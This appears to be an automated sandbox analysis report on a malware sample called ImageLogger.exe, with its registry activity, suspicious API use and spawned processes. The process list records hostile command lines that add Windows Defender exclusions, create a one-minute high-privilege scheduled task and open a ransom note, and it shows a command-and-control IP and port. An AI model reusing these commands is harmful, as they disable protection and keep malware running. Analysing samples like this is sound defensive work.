Set value (int) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (8 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (4 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A (2 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (4 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (2 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A (43 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (8 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (12 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (6 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (5 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (4 identical rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (29 rows, alternating with the row below)
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (28 rows, alternating with the row above)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (52 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (12 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (48 identical rows)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (16 identical rows)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1424 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 1424 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 1424 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 1424 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 identical rows)
PID 1424 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Windows\System32\schtasks.exe (2 identical rows)
PID 1424 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows)
PID 3852 wrote to memory of 1100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows)
PID 3852 wrote to memory of 852 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (40 identical rows)
PID 3852 wrote to memory of 912 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (2 identical rows)
PID 3852 wrote to memory of 4884 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (8 identical rows)

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe

"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ImageLogger.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x40,0x134,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff638c5ae48,0x7ff638c5ae58,0x7ff638c5ae68

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4692 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3372 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4744 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3512 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3cc 0x2ec

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SDRSVC

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5776 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe

"C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Local\Temp\wszaxi.exe

"C:\Users\Admin\AppData\Local\Temp\wszaxi.exe"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jlkern.mp3"

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 39917 <123456789> FADB3748ACBB914CAD69

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1696 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

